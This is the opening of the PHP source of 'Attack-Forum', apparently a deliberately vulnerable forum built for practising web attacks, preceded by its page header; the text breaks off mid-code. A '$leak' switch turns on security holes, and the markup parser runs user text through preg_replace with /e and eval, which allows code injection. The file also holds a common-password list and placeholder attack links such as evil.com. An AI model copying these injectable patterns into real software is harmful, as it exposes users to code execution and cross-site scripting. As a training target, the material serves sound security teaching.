Logo

Attack-Forum

Startseite / SourceInfos | Impressum | Mitglieder | Blog | Suche

Login Benutzername oder eMail:

Kennwort: (Vergessen?)




Neues Mitglied werden
<?php                           // charset=iso-8859-1 / tabs=8 / lines=cr+lf / GPL (c) 2019 by Michael Engelke

$config = 'xssconfig.php'; // Config-File für $cfg Variable
$title = 'Attack-Forum'; // Forum Titel (Text)
$cache = true; // Browsercache benutzen
$css = false; // Eigenes CSS (Url)
$logo = false; // Eigenes Logo (Url)
$icon = false; // Eigenes Favicon (Url)
$gast = false; // Schreibrechte für Gäste
$svdb = true; // Datenbank bei Fehler/Zerstörung sichern
$imps = true; // Impressum im Menü anzeigen
$inet = true; // Ohne Zwangsanmeldung übers Internet
$user = true; // User neuanmeldung
$ipck = true; // Internet-Adressen per DNS prüfen
$craw = true; // WebCrawler indizierung
$leak = true; // Sicherheitslücken aktivieren ($leak=1 für PHP-Code-Injection)
$base = '.'.basename(__FILE__,'.php').'.'.((isset($bext)) ? $bext : 'sdb'); // SQLite-Datenbank
$home = './media'; // Localer Pfad um externe Links Offline verfügbar zumachen

# Harmlose Urls und Daten für die Attacken
$attack = array(
'_xlink_' => 'http://example.com',
'_glink_' => 'http://bing.de#/bing.html',
'_elink_' => 'http://evil.com#/evil.html',
'_flink_' => 'http://get.adobe.com/de/flashplayer/',
'_nlink_' => 'http://nyan-cat.com/nyan-cat-fly.swf',
'_clink_' => 'http://placekitten.com#/placekitten.php',
'_hlink_' => 'http://heise.de/security/#/security.html',
'_blink_' => 'http://mengelke.gmxhome.de/images/banner.gif',
'_ylink_' => 'http://youtube.com/embed/DLzxrzFCyOs?&autoplay=1#/rickrolling.html',// Y1g2Cx03L2I in Deutschland gesperrt
'_bnlink_' => false, // $self/bnps.js
'_jsleak_' => "location.pathname", // "'http://localhost/xssforum.php'"
'_charlist_' => 'abcdefghijklmnopqrstuvwxyz',
'_wordlist_' => preg_replace(array('/^\s+|\s+$/','/\s+/'),array('',' '),'12 23 42 69 96 pi
*** 000 007 123 666 abc bob bot car cat cia fbi gay god
jim guy pie nsa sex **** 0000 1111 1234 baby ball bike boss dick
chef gott fuck ipad ipod jack john kitt lexy love mike nike pass sexy
shit test tits xbox ***** 00000 12345 54321 67890 09876 admin adobe alarm angel
apple buffy bundy chick elvis hallo hello jesus kitty motor nokia pussy robot spike
****** 000000 111111 123123 123456 53cr37 654321 666666 696969 abc123 access andrew ashley azerty
bailey batman beetle biteme buddha buster cherry daniel dragon ficken fuckme geheim george guitar
hallo1 harley hockey hunter iphone jordan joshua killer lovely master mobile monkey nicole qaywsx
qazwsx police qwerty qwertz ranger robert schatz secret shadow soccer summer thomas sweaty tigger
1234567 asshole beatles bigbobs bigdick bond007 charlie demo123 ferrari freedom fucking fuckoff fuckyou ironman
jessica lesbian letmein michael mustang nirvana pass123 patrick pokemon samsung test123 testing walmart welcome
******** 12345678 1q2w3e4r 1qay2wsx 1qaz2wsx babydoll babygirl
baseball butthead cencored computer football fussball hallo123
harddisk iloveyou jennifer kennwort kittycat lacrosse michelle
mohammed p455w0rd passw0rd password passwort princess pussycat
startrek starwars sunshine superman trustno1 usbdrive zensiert
123456789 1qa2ws3ed adminpass arschloch asdfghjkl cellphone metallica
microsoft password1 passwort1 raspberry schalke04 spiderman swordfish
webmaster 1234567890 lockerroom sexmachine uncencored sagichnicht administrator'
));

# Sicherheitsfragen wenn das Kennwort vergessen wurde (Die Fragen sind aus der Praxis - Etwas umformuliert)
$pass = array(" Bitte Wählen...", "Was steht auf der Unterseite Ihrer Maus?",
"Wie war Ihr erstes Kennwort?", "Wie hieß Ihr Haustier in Ihrer Kindheit?",
"Wie heißt Ihr Lieblingsbuch?", "Wo haben sich Ihre Eltern kennengelernt?",
"Wie heißt Ihr Lieblingsfilm?", "In welcher Strasse sind Sie aufgewachsen?",
"Wie heißt Ihr Lieblingslied?", "Welchen Strand haben Sie zuerst betreten?",
"Wie hieß Ihr erster Vorgesetzter?", "Wie hieß Ihr Stofftier in Ihrer Kindheit?",
"Was war der Beruf Ihres Großvaters?", "Wo haben Sie Ihren Partner kennen gelernt?",
"Mit wem tranken Sie Ihr erstes Bier?", "Wie hieß Ihr erstes gekauftest Musikalbum?",
"Wie war der Mädchenname Ihrer Mutter?", "Wie hieß Ihr Bester Freund in Ihrer Kindheit?",
"Wie hieß Ihr erster Film ab 18 Jahren?", "Wie hieß die Stadt, in der Sie geboren wurden?",
"Wie heißt Ihre Lieblingssportmannschaft?", "Wie sind die letzten 4 Ziffern ihrer Kreditkarte?");

# Password-Hasher / HTML/ASCII entwerten / JavaScript komprimieren
$hash = array('sha1','http://pajhome.org.uk/crypt/md5/2.2/sha1-min.js','sha1_vm_test','hex_sha1'); // sha1 mit PHP & JavaScript
$html = array('&' => '&amp;', '<' => '&lt;', '>' => '&gt;', '"' => '&quot;', "'" => "&#39;");
$uml = array('ä' => '&auml;', 'ö' => '&ouml;', 'ü' => '&uuml;', 'ß' => '&szlig;', 'Ä' => '&Auml;', 'Ö' => '&Ouml;', 'Ü' => '&Uuml;'); // ' ' => '&nbsp;'
$js = '/(?<!else)\s*?\/\/\s[^\r\n]+\s* |(?<=\w)\s*(?=\s\w) |\s*[\r\n]+\s* |(?<=else\s)\s*(?=\w) |\s+(?=[\/][^\/])
|\s+(?=[!&(--:-?|]{1,2}) |(?<=[!&(--:-?|\/])\s+ |\s*(?=\{) |(?<=\{)\s* |;\s*(?=\}|<\\\\?\/|$)/ix'
;
$jschat = array( // JavaScript-Code für CryptChat
'prime' => 'SX5JX5ET7NYKTUHIA87AP57LZ76IOPL1Z9I1LOKG8WRKQUEVRJ136LQCQYRJR6E4HV0DEBXWX5143JJID1TAZ3MXMWNHZIVGPH0' // Prime 1024 Bit
.'VM87M06SUKH7707G1AEHK7OROB95TYSDN0DDC6OJVC4HC47OSEKUDBSIVUP0TSIYGAQPTBXRXBSPQOMENCNLSY8T3ZAA2D8ASGN',// in Base 36
'main' => false, // Globale Constante für den Diffie-Hellman Schlüsseltausch (false für Automatisch Generieren)
'base' => 36, // Basiswert der Zahlen (2-36)
'crypt' => array( // Verschiedene Scripte zur Verschlüsselung
'int' => 'http://peterolson.github.io/BigInteger.js/BigInteger.min.js', // http://silentmatt.com/biginteger/
'aes' => 'http://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js',// http://code.google.com/p/crypto-js/#AES
));

# Forum-Formatierungen
$creole = array(
'/(~?)\\\\x([89a-f][\da-f])|[$ ]|&(?!#?x?[\w-]+;)|(?<!~)~ /ie' => # Zeichen Entwerten & \x1f ('"&#".ord("$0").";"',)
'("$0" == "~ ") ? "&nbsp;" : (("$2") ? (("$1") ? substr("$0",1) : chr(hexdec("$2"))) : strtr(htmlentities("$0"),array("$" => "&#36;")))',
'/(~?)(?:\<|&lt;){3}(\w+)\s*(.*?)\s*(?:\>|&gt;){3}/es' => # <<<x>>>
'("$1") ? strtr(substr(@"$0",1),array("&lt;" => "&#60;")) : ((isset($creoleph["$2"])) ? ((is_string($creoleph["$2"]))
? ((is_callable($creoleph["$2"])) ? $creoleph["$2"](@"$3") : $creoleph["$2"])
: preg_replace(array_keys($creoleph["$2"]),array_values($creoleph["$2"]),@"$3")) : (("$2" == "_") ? "" : @"$3"))'
,
'/\{\{\{\s*((?:[^{}]++|\{(?1)\})*|.*?)\s*\}\}\}/es' => # {{{ Vorformatiert }}}
'"<pre>".preg_replace(array("/(?<=&)([gl])t(?=;)/e",
"/\\\\\\\\\\\'|(&#?\w+;)|(?![\x80-\xff])[[:punct:]]|(?<=[a-z\d])[A-Z]/e","/\r?\n/"),array("((\"\\$1\" == \"l\") ? \"#60\"
: \"#62\")","((\"\\$1\") ? \"\\$1\" : \"&#\".ord(substr(\"\\$0\",-1)).\";\")","<br />"),"$1")."</pre>\r"'
,
'/(?:<|&lt;)(\w+)(?:&gt;|>).*?(?:<|&lt;)\/\1(?:&gt;|>)/se' => # <tag>html-light</tag>
'(($x = "$0" and $z = "\x5c") ? eval(\'while(preg_match(\\\'/(?:<|&lt;)([bipqsu]|abbr|acronym|big|c(?:it|od)e|del|dfn|em|h[1-6]|ins'
.'|kbd|pre|samp|small|str(?:ike|ong)|su[bp]|tt|var)(?:&gt;|>)(.+?)(?:<|&lt;)\/\\\\1(?:&gt;|>)/s\\\',$x,$y,PREG_OFFSET_CAPTURE))
$x = substr($x,0,$y[0][1])."<_{$y[1][0]}>{$y[2][0]}<_/{$y[1][0]}>".substr($x,$y[0][1] + strlen($y[0][0]));
return preg_replace("/(?<=<)_(?=\/?\w+>)|$z$z(?=[\\\'\"])/","",$x); \') : 0)'
,
'/(?:&(?:amp;)?|\?)#(0*(?:1(?:2[89]|[3-9]\d)|[2-9]\d\d|\d{4,})|x0*(?:[89a-f][\da-f]|[\da-f]{3,}));|\\\\u(?:\{(?=(?:\w+)\}))?([\da-f]+)\}?/ei' => # &#x123; / \u123
'("$1") ? "&#$1;" : "&#x$2;"',
'/(?:<|&lt;)a\s[^>]*?href=\s*(&quot;|&\#39;|["\']?)((?:[^>&\s"\']|&(?!gt;))+)\1[^>]*?(?:&gt;|>)\s*(.*?)\s*(?:<|&lt;)\/a(?:&gt;|>)/ie' => # <a href="link">text</a>
'\'<a href="$2" rel="nofollow" target="blank">\'.((\'$3\') ? \'$3\' : \'$2\').\'</a>\'',
'/(?:<|&lt;)img[^>]*?src=\s*(&quot;|&\#39;|["\']?)((?:[^>\s&"\']|&(?!gt;))+)\1[^>]*?(?:&gt;|>)/i' => # <img src="">
'<img src="$2" alt="$2" border="0" />',
'/^$/' => '', # -> Hier kommen die Smilies & Forum-Erweiterungen hin!
'/\[(\w+)[^\]]*\].*?\[\/\1\]/es' => # [bbcode=option]text[/bbcode]
'(($x = "$0") ? eval(\'while(preg_match(\\\'/\[(\w+)(?:=([^\]]+))?\](.*?)\[\/\\\\1\]/s\\\',$x,$y,PREG_OFFSET_CAPTURE)) {
$y = array($y[0],strtolower($y[1][0]),$y[2][0],$y[3][0]); if(preg_match("/^([ibus]|center)$/",$y[1])) {
$z = array("b"=>"strong", "i"=>"em", "u"=>"ins", "s"=>"del", "center"=>"center"); $z = "<{$z[$y[1]]}>$y[3]</{$z[$y[1]]}>"; }
elseif($y[1] == "list" and preg_match("/^[1ia]?$/i",$y[2]) and strstr($y[3],"[*]")) $z = strtr(($y[2] == "")
? "<ul>$y[3]</li></ul>" : (($y[2] == 1) ? "<ol>$y[3]</li></ol>" : "<ol type=\"$y[2]\">$y[3]</li></ol>"),array("[*]" => "<li>"));
elseif(preg_match("/left|right/",$y[1])) $z = "<div align=\"$y[1]\">$y[3]</div>";
elseif(preg_match("/^(font|color|size)$/",$y[1]) and preg_match("/^[\w#-]+$/",$y[2])) $z = "<font ".(($y[1] == "font")
? "face" : $y[1])."=\"$y[2]\">$y[3]</font>"; elseif($y[1] == "code") $z = "<pre>"
.preg_replace("/(?![&#;<>=\"\/])[[:punct:]]/e","\"&#\".ord(\"\\$0\").\";\"",$y[3])."</pre>"; elseif($y[1] == "img")
$z = "<img src=\"$y[3]\" alt=\"".basename($y[3])."\" border=\"0\">"; elseif(preg_match("/^(link|url)$/",$y[1]))
$z = "<a href=\"".str_replace(" ","%20",($y[2]) ? $y[2] : $y[3])."\" target=\"_blank\" rel=\"nofollow\">".((trim($y[3]))
? trim($y[3]) : $y[2])."</a>"; elseif($y[1] == "email") $z = "<a href=\"mailto:".rawurlencode(($y[2] != "") ? $y[2]
: $y[3])."\">".preg_replace("/(?![&#;<>=\"\/])[[:punct:]]/e","\"&#\".ord(\"\\$0\").\";\"",$y[3])."</a>";
elseif($y[1] == "quote") $z = "<blockquote>".(($y[2] != "") ? "<address>$y[2]</address>" : "")."$y[3]</blockquote>";
elseif($y[1] == "audio" and preg_match("/^(aac|mp[ag1-4]|m4a|og[ga]|wav|pcm)(;js)?$/",$y[2],$z))
$z = preg_replace(((isset($z[2])) ? "/^(.*)$/es" : "/^$/"), "\"<script type=\x27text/javascript\x27>document.write(\x27\"
.strtr(\"\$1\",array(\"/\" => \"\/\")).\"\x27);</script>\"","<audio autobuffer controls><source src=\"$y[3]\" type=\"audio/"
.preg_replace(array("/mp[123ag]/","/m4a/","/og[ga]/"),array("mpeg","mp4","ogg"),$z[1])."\" />$y[3]</audio>");
elseif($y[1] == "video" and preg_match("/^(youtube|dailymotion|(mp4|ogg))(?:;(\d+)x(\d+))?(?:;(js|left|right))?$/",$y[2],$z)
and (preg_match("/^\w+$/",$y[3]) or $z[2])) $z = ($z[2]) ? preg_replace(((isset($z[5])) ? "/^(.*)$/es" : "/^$/"),
"\"<script type=\x27text/javascript\x27>document.write(\x27\".strtr(\"\$1\",array(\"/\" => \"\/\")).\"\x27);</script>\"",
"<video src=\"$y[3]\" type=\"video/".substr($z[2],-3)."\"".((isset($z[3])) ? " width=\"$z[3]\"" : "").((isset($z[4]))
? " height=\"$z[4]\"" : "").((preg_match("/#(.*)$/",$y[3],$z)) ? " poster=\"$z[1]\" preload=\"none\"" : "")
." autobuffer controls>$x[2]</video>") : "<iframe src=\"http://www.".strtr(strtr($z[1],array(
"youtube" => "youtube.com/embed/#", "dailymotion" => "dailymotion.com/embed/video/#")), array("#" => $y[3]))."\" width=\""
.((isset($z[3])) ? $z[3] : 640)."\" height=\"".((isset($z[4])) ? $z[4] : 480)."\"".((isset($z[5]) and $z[5] != "js")
? " align=\"$z[5]\"" : "")." frameborder=\"0\"></iframe>"; else $z = $y[3];
$x = substr($x,0,$y[0][1]).$z.substr($x,$y[0][1] + strlen($y[0][0])); } return $x; \') : 0)'
,
'/\[\[\[((?:[^\[\]]++|\[(?1)\])*|.*?)\]\]\]/es' => # [[[ Pre-Linebreaks ]]]
'preg_replace(array("/\\\\\\\\\\\\\\\\\r?\n/","/\r?\n/","/~([^~])/e"),array("","<br />","\"&#\".ord(\"\$1\").\";\""),"$1")',
'/(?<=^|\s)\/\*\s.*?\*\/(?=\s|$)|(?<!^|~)~\r?\n|^[ \t]+$/sm' => # /* Kommentar */
'',
'/^(([ \t].*([\r\n]+|$))+)/em' => # Vorformatiert
'"<pre>".preg_replace(array("/\\\\\\\\x5c+(?=[\'\"])/","/~(&#?\w+;|[^~])/e","/\s*[\r\n]+/"),array("","\"&#\"
.ord(html_entity_decode(\"\\$1\")).\";\"","<br />"),"$1")."</pre> "'
,
'/\?\?\s*(\w+)(?:\s*([:=])\s*(.+?))?\s*\?\?/e' => /* ??key=val?? / ??key?? */ 'eval(\'
return ($x = "$1" and $y = preg_replace("/\?(\w+)\??/e","((isset(\\\\$creolevar[\"_\$1\"])) ? \\\\$creolevar[\"_\$1\"]
: \"\$0\")","$3")) ? (($creolevar["_$x"] = $y and "$2" == "=") ? "" : $y) : ((isset($creolevar["_$x"])) ? $creolevar["_$x"]
: "");\')'
,
'/(?<=^|[\r\n])(~?)((={1,6})=*(&(?:[gl]t|#6[02]);|[<^>]?)\s*(?:%(\w+)%)?\s*(.+?)[\s=]*?(\[\[#\w+\]\]|#)?(?:\r?\n|$))/e' => # =Titel= [[#anker]]
'("$1") ? "$2" : ($x = (("$7" == "#") ? "[[#".preg_replace(array("/[^a-z\d]+/i","/^(?=\d+)/"),array("","al"),"$6")."]]"
: "$7"))."<h".strlen("$3").(("$4") ? preg_replace(array("/<|&(lt|#60);/","/\^/","/&(gt|#62);|>/"),
array("left","center","right")," align=\"$4\"") : "").(("$5") ? " class=\"$5\"" : "").">"
.($y = preg_replace("/(<.*?>)|(?![~&#;])([!-\/:-@\[-`\{-~])/es","(\"\\$1\") ? \"\\$1\" : \"&#\".ord(\"\\$2\").\";\"","$6"))
."</h".strlen("$3").">\r".(("$7" and $creolevar[".al"][substr($x,3,-2)] = $y) ? "" : "")'
,
'/(?<!@)@@(.*?)@@(?!@)/es' => # @@Fest@@
'"<code>".preg_replace(array("/\\\\\\\\x5c+(?=[\'\"])/","/~(&#?\w+;|[^~])/e"),
array("","\"&#\".ord(html_entity_decode(\"\\$1\")).\";\""),"$1")."</code> "'
,
'/(?<![!-]|[@\/.]xn)--(?!-)([^\r\n]+?)(?<!-)--(?!-)/' => # --Klein--
'<small>$1</small>',
'/(?<!~)~~(.+?)~~(?!~)/' => # ~~Durchgestrichen~~
'<del>$1</del>',
'/(?<!_)__(.+?)__(?!_)/' => # __Unterstrichen__
'<ins>$1</ins>',
'/(?<!#)##(?!\s)(.+?)(?<!\s)##(?!#)/' => # ##Druck##
'<tt>$1</tt>',
'/(?<!\^)\^\^(.+?)\^\^(?!\^)/' => # ^^Hoch^^
'<sup>$1</sup>',
'/(?<!,),,(.+?),,(?!,)/' => # ,,Tief,,
'<sub>$1</sub>',
'/\*\*(?!\s)((?:[^\n]*?(?<!\*)|(?<![\r\n]|\*\*)\r?\n(?!\r?\n|\*\*)){1,3})(?<!\s)\*\*/' => # **Fett**
'<strong>$1</strong>',
'/(?<!\{)\{\{(?!\{)\s*(&(?:[gl]t|#6[02]);|[<>]?)\s*([+-]?)\s*(?:%(\w+)%\s*)?(:|;|https?:|\/)?([^#|}<>]+)(?:#(\d+)[x*.-](\d+)|[^|}]*?)?\s*(?:\|\s*([^|}]*)(?:\|([^}]+))?)?\s*(?<!\})\}\}(?!\})/e' => # {{<>+-%class%Bild#width-height|Note|style}}
'preg_replace("/&(?!#?\w+;)/","&amp;","<img ".(("$2") ? "class=\"$3\"" : "")."src=\"".(("$4" == ":") ? "http://" : (("$4" == ";") ? "https://" : "$4"))
.preg_replace("/[\s\x80-\xff]+/e","urlencode(\"\$0\")","$5")."\"".(("$6" and "$7") ? " width=\"$6\" height=\"$7\"" : "")
." alt=\"$8\" title=\"$8\" border=\"".(("$2" == "+") ? 1 : 0)."\"".(("$9") ? " style=\"$9\"" : "")
.(("$1") ? preg_replace(array("/<|&(lt|#60);/","/&(gt|#62);|>/"),array("left","right")," align=\"$1\"") : "")." />")'
,
'/(~|[&\#\w;]+(?<!-)-?)?\[\[\s*(\^|%\w+%\s*)?(?:([^\]]+)\s*-(?:\>|&gt;|&\#62;)\s*)?(~?\(?(?:https?|ftp|mailto)?:|;|~?[\/\#])?([^|\]]+?)(?:\^([^|\]]+)\^)?(?:\s*\|\s*([^\]]+))?\s*\]\]((?:-?(?!-)[&\#\w;]+)+)?/e' => # pre[[%class%Link_~(url~)(?Versteckt)^Title^]]end / [[%class%Link^Title^|Text]] / [[%class% Text -> Link^Title^]]
'("$1" == "~") ? substr(@"$0",1) : "<a ".(("$2") ? "class=\"".(("$2" == "^") ? "home" : preg_replace("/\W+/","","$2"))."\" " : "")
.((preg_match("/^~?(http|:|;)/","$4")) ? "target=\"_blank\" rel=\"nofollow\" " : "").(("$6" != "") ? "title=\"$6\" "
: "").preg_replace("/&(?!#?\w+;)/","&amp;",((substr("$4",0,1) == "#" && "$3$7" == "") ? "name=\"$5\">$1$8"
: (("$2" == "" and substr("$4",0,1) == "#") ? "class=\"anchor\" " : "")."href=\"".((substr("$4",0,1) == "~")
? (($x = preg_replace("/!!(.*?)!!/e","rawurlencode(\"\$1\")",substr("$4",1)."$5") and "$1$3$7$8") ? "$x\">$1$3$7$8"
: "$x\">$x"): preg_replace(array("/(?:[\\\\\\\\x5c~]([(+~)])|([\s\x80-\xff]+))/e","/&(?!amp;)#?x?\w+;/e","/[()]/"),
array("rawurlencode(\"\$1\$2\")","urlencode(html_entity_decode(\"\$0\",ENT_QUOTES))",""),(("$2$4" == "^")
? "$_SERVER[SCRIPT_NAME]/" : (("$4" == ":") ? "http://" : (("$4" == ";") ? "https://" : "$4")))."$5")."\"".">"
.((($x = (("$3$7" && "$3$7" != "+") ? "$1$3$7$8" : "$1"
.preg_replace("/(^(?=[^(]*\))|(?<![\\\\\\\\x5c~])\().+?((?<![\\\\\\\\x5c~])\)|$)|[\\\\\\\\x5c~](?![\\\\\\\\x5c~])|^[:;]/",
"","$4$5")."$8")) && "$3$7" == "+") ? preg_replace(array("/%[\da-f]{2}/ei",
"/[_+]|(?<=[[:lower:]\d])(?=[[:upper:]])|(?<=[^-\d])(?=\d[-\d]*( |$))|(?<=[[:upper:]])(?=[[:upper:]][[:lower:]\d])/u"),
array("urldecode(\'\$0\')"," "),$x) : $x)))."</a>")'
,
'/(?<![\w\/+])\+\+(.+?)\+\+(?![\w\/+])/' => # ++Groß++
'<big>$1</big>',
'/(?<!http:|https:|ftp:|[\w\/+])\/\/(?!\s)((?:[^\n]+?|(?<![\r\n]|\/\/)\r?\n(?!\r?\n|\/\/)){1,3})(?<!http:|https:|ftp:|\s)\/\/(?![\w\/+])/' => # //Kursiv//
'<em>$1</em>',
'/(?:^|(?<=[\r\n]))(~?)((?:[;:>]|&gt;)(?:.*\r?\n(?=(?:[;:>\w]|&gt;))|.*)+)/e' => /* # Definitionen */
'(@$x = strtr("$2",array("\\\'" => "\'"))) ? eval(\'if(!"$1"
and preg_match_all("/(?<=^|\s|\W)([;:]+)\s*((?:.*?(?=[\s\W][;:]|$)|(?<=\w)[;:])+)[ \t]*/s",
preg_replace(array("/(?<=^|\n)(&gt;|>)+/e","/&(?!#?\w)/"),array("str_replace(array(\"&gt;\",\">\"),\":\",\"\$0\")","&amp;"),
$x),$ay)) { $x = ""; $z = 0; foreach($ay[2] as $k => $v) { $w = strlen($ay[1][$k]) - $z;
$y = (substr($ay[1][$k],0,1) == ";") ? "t" : "d"; if($w > 0) { $u = 1; while($u++ < $w) { $x .= "<dd><dl>"; $z++; }}
elseif($w < 1) while($w++ < 1) { $x .= "</dl></dd>"; $z--; } $x .= "<d$y>".trim($v)."</d$y>"; } while($z--)
$x .= "</dl></dd>"; $x = "<dl>$x</dl>"; } return $x; \') : 0'
,
'/(?:^|(?<=[\r\n]))(~?)((?:\*|#)+(?![*#\r\n]).+?)(?=\r?\n(?![*#])|$)[ \t]*(?![*#])/es' => /* # Auflistung */
'(@$x = strtr("$2",array("\\\'" => "\'"))) ? eval(\'if(!"$1" and
preg_match_all("/^(\*+|#+)(?:([acdins])?(\d+)?(?<=\w)[*#])?\s*(.*?)\s*$/mi",preg_replace("/&(?!#?\w)/","&amp;",$x),$ay)) {
$x = ""; $z = array(); foreach($ay[4] as $k => $v) { $w = strlen($ay[1][$k]) - count($z);
$y = (substr($ay[1][$k],0,1) == "*") ? "u" : "o"; if($w > 0) { $u = 1; while($u++ < $w) { $x .= "<dl><dd>"; $z[] = "dl"; }
$x .= "<{$y}l".(($ay[2][$k]) ? " type=\"".strtr($ay[2][$k], array("d" => "disc", "c" => "circle", "s" => "square",
"n" => "none"))."\"" : "").">"; $z[] = $y."l"; } elseif($w < 0) while($w++ < 0) $x .= (($u = array_pop($z)) == "dl")
? "</dd></dl>" : "</li></$u>"; if(end($z) != $y."l") { $x .= (($u = array_pop($z)) == "dl") ? "</dd></dl><{$y}l>"
: "</li></$u><{$y}l>"; $z[] = $y."l"; } $x .= "<li".(($ay[3][$k]) ? " value=\"{$ay[3][$k]}\"" : "").">$v"; }
while($u = array_pop($z)) $x .= ($u == "dl") ? "</dd></dl>" : "</li></$u>\r"; } return $x; \') : 0'
,
'/(?<=^|[\r\n])(~?)(\|.*?)(?=\n(?!\|)|$)[ \t]*(?!\|)/es' => /* | Tabelle | */ '(@$x = strtr("$2",array("\\\'" => "\'"))) ? eval(\'
if(!"$1" and preg_match_all("/^\|(.*?)\|?\s*$/m",preg_replace(array("/^\|[^=|\n]*\r?\n/","/&(?!#?\w)/"),
array("","&amp;"),$x),$ay)) { foreach($ay[1] as $k => $v) { $ay[0][$k] = preg_split("/(?<!~)\|/",$v);
$ay[2][] = count($ay[0][$k]); $x = -1; foreach($ay[0][$k] as $u => $w) if($w != "") $x = $u; elseif($x >= 0 && $w == "") {
$ay[3][$k][$x] = (isset($ay[3][$k][$x])) ? $ay[3][$k][$x] + 1 : 1; unset($ay[0][$k][$u]); }}
if(count(array_unique($ay[2])) > 1 and $u = min($ay[2])) foreach($ay[0] as $k => $x) $ay[0][$k] = array_slice($x,0,$u);
foreach($ay[0] as $k => $trow) { $ay[1][$k] = "<tr>"; foreach($trow as $x => $tcell)
if(preg_match("/^(=?)([ \t]*)(.*?)([ \t]*)$/",$tcell,$v)) $ay[1][$k] .= "<t".(($v[1] != "") ? "h" : "d").((isset($ay[3][$k][$x]))
? " colspan=\"".($ay[3][$k][$x]+1)."\"" : "").(($v[2] != "" && $v[4] != "") ? " align=\"center\""
: (($v[2] != "" && $v[4] == "") ? " align=\"right\"" : (($v[2] == "" && $v[4] != "") ? " align=\"left\"" : ""))).">"
.preg_replace(array("/~\|/","/^_$/","/(?<!~)~-/"),array("|","&nbsp;","<br />"),$v[3])."</t".(($v[1] != "") ? "h" : "d").">";
$ay[1][$k] .= "</tr>"; } if(preg_match("/^\|\s*(&(?:[gl]t|#6[02]);|[<^>]?)\s*([-+])?\s*(?:%(\w+)%)?\s*(\d+%?)?\s*$/m","$2",
$v)) $v[1] = ((isset($v[1]) and $v[1]) ? preg_replace(array("/<|&(lt|#60);/","/\^/","/&(gt|#62);|>/"),
array("left","center","right")," align=\"$v[1]\"") : ""); return "<table ".((isset($v[3]) and $v[3]) ? "class=\"$v[3]\" "
: "")."border=\"".((isset($v[2]) and $v[2] == "-") ? 0 : 1)."\"".((isset($v[1])) ? $v[1] : "").((isset($v[4]) and $v[4])
? " width=\"$v[4]\"" : "").">".implode("",$ay[1])."</table>"; } return $x; \') : 0'
,
'/(~?)(?<!<|&lt;)((?:\<|&lt;){2}(\w+)\s*(.*?)\s*(?:\>|&gt;){2})/e' => /* <<function ...>> */
'(@$x = array("$3",strtr("$4",array("\\\'" => "\'"))) and !"$1" and
preg_match_all("/(?:(\w+)=)?(?:(\'|&(?:amp;)?(?:#34|#39|quot);)(.*?)(?<!\\\\\x5c|&#92;)\\\\\\\2|(\S+))|(\S+)|^$/",$x[1],$y)
and ((isset($creolepi[$x[0]]) and $x[2] = $creolepi[$x[0]] or 1) and !eval(\'while($z = each($y[3])) $y[(($y[1][$z[0]])) ? 6
: 7][$z[0]] = ($z[1]) ? $z[1] : $y[4][$z[0]]; if(isset($x[2]) and isset($x[2][1])) { $x[3] = (is_array($x[2])) ? $x[2][0]
: $x[2]; if(is_array($x[2][1])) { $x[4] = array_flip($y[1]); foreach($x[2][1] as $z) { if(isset($x[4][$z])) {
$x[5][$z] = $y[6][$x[4][$z]]; unset($y[6][$x[4][$z]]); } elseif(preg_match("/^(\w+)\?$/",$z,$y[8])) { $z = $y[8][1];
if(isset($x[4][$z])) { $x[5][$z] = $y[6][$x[4][$z]]; unset($y[6][$x[4][$z]]); } elseif($y[8] = each($y[7])) {
$x[5][$z] = $y[8][1]; unset($y[7][$y[8][0]]); }} elseif($y[8] = each($y[7])) { $x[5][$z] = $y[8][1];
unset($y[7][$y[8][0]]); } else { unset($x[5]); $x[2][1] = count($x[2][1]); break; }}} if(is_int($x[2][1]) and $x[2][1]
and count($y[0]) >= $x[2][1]) for($z=0;$z<$x[2][1];$z++) $x[5][$z] = (isset($y[6][$z])) ? $y[6][$z] : $y[7][$z]; }
if(isset($x[2][1]) and is_int($x[2][1]) and !$x[2][1] and count($y[0]) or !isset($x[2])) { for($z=0;$z<count($y[0]);$z++)
$x[5][$z] = ($y[3][$z]) ? $y[3][$z] : $y[4][$z]; $x[5] = array(implode(" ",$x[5])); } $z = (isset($x[5])) ? $x[5]
: ((isset($y[6])) ? $y[6] : false);\'))) ? eval(((isset($x[3]) and preg_match("/^\w+$/",$x[3]) and function_exists($x[3]))
? \'return ($z) ? @call_user_func_array($x[3],array_values($z)) : @$x[2]();\' : ((isset($x[3]) and preg_match("/[(\s;)]/",
$x[3]) and ((is_string($x[2])) or isset($x[5]))) ? $x[3] : \'return $z[0];\'))) : ""'
,
'/([~^]?)(?<=^|[\s~^]|[^\'"]>)((?:(?:s?ftp|http)s?:\/\/|(www\.))(?:[\w.-]+(?::[^\s@]+)@)?(?:\[[\da-f:]+\]|[\w.-]+)[\/?\#]?(?:[\w.\/:_?=&;\#%+-]*?(\.(?:bmp|bpg|gif|ico|jpe?g|jp?2k?|png|svg|webp))|[\w.\/:_?=&;\#%+-]*)|(?<=^|[~|^\s]|\\\\)((?:(?:[A-Z]+[a-z\d]+){2,8}|(?<=\^)\w+)(?:\#\w+)?)(?=\\\\|[\s,.!?~|]|$)|(?<!mailto:|["<\w])(\w[\w._\/-]*@[\w.-]+\.\w+))(?![^<]+<\/a>)/e' => # http://link / www.pic.jpg / mail@to.me / WikiLink
'("$1"=="~") ? strtr("$2",array(":"=>"&#58;","@"=>"&#64;")) : preg_replace("/&(?!amp;)/","&amp;",(("$4") ? "<img src=\""
.(("$3") ? "http://" : "")."$2\" alt=\"$2\" />" : "<a href=\"".(("$5") ? "$_SERVER[SCRIPT_NAME]/$2\" class=\"home\""
: (("$3") ? "http://" : (("$6") ? "mailto:" : ""))."$2\" rel=\"nofollow\" target=\"_blank\"").">$2</a>"))'
,
'/(?<=^|\n)----\r?\n?/' => "<hr />\r",
'/(~)?(\\\\{2})/e' => "('$1') ? '$2' : '<br />\r'",
'/\\\\\r?\n/' => "",
'/[\r\n]+--([\r\n]+|$)/' => "<br clear='all' />\r",
'/(\r?\n){3,}/' => "\r\n\r\n",
'/(\r?\n){2}/' => "<p><!----></p>\r",
);
$creoleph = array( // <<<Placeholder ...>>> # Frühzeitige Erweiterungen mit eigenen Regulären Ausdrücken / Addons
'cms' => array('/^\s*(\w+)\s*(\+?)$/e' => '(isset($creolevar["type"]) and preg_match("/^(cms|feed)$/",$creolevar["type"]))
? preg_replace(array("/[$]/","/~(?=(<|&lt;){3})/"),array("&#36;",""), $sql["sq"]($conn,"select ".(("$2") ? "description"
